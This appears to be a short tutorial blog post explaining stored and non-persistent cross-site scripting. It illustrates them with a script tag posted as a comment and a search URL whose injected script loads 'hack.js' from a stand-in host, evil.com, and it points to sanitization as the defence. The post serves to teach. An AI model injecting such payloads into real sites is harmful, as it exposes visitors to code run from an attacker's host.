What is XSS injection?

XSS injection (XSS stands for Cross-Site Scripting) works a bit like SQL injection: improperly sanitized user-submitted data is used to alter the application’s functionality. Instead of altering SQL queries, XSS injection alters HTML and JavaScript.

For example, a hacker could leave the following comment on a vulnerable site:

<script>alert('Your site was hacked!');</script>

When the site displays the comments, it also serves the hacker’s malicious code:

<div class='comment'>
    John Johnson said:
    What a great site! Thank you for this article!
<div class='comment'>
    CleverHacker said:
    <script>alert('Your site was hacked!');</script>

In the example above, all sites visitors would see a popup that says “Your site was hacked”. Far more potent attacks have been used to deface important websites.

It is called persistent or stored XSS when the server stores the malicious code and serves it to the users as in our example above. When the attack is performed by injecting the code in invalid URL parameters, it is called non-persistent XSS.

The following example shows how a non-persistent XSS attack is performed. In this example, Bob sends Alice the following URL:

http://news.org/search/?q=<script src='evil.com/hack.js'></script>

Since the page displays the search query, the <script> tag will be executed and the malicious JavaScript file will be loaded:

    Showing results for query <script src='evil.com/hack.js'></script>

XSS injection can be preventing by properly sanitizing any user-provided data. OWASP has an excellent guide on securing your applications against XSS.

Leave a Reply

Your email address will not be published. Required fields are marked *

To create code blocks or other preformatted text, indent by four spaces:

    This will be displayed in a monospaced font. The first four 
    spaces will be stripped off, but all other whitespace
    will be preserved.
    Markdown is turned off in code blocks:
     [This is not a link](http://example.com)

To create not a block, but an inline code span, use backticks:

Here is some inline `code`.

For more help see http://daringfireball.net/projects/markdown/syntax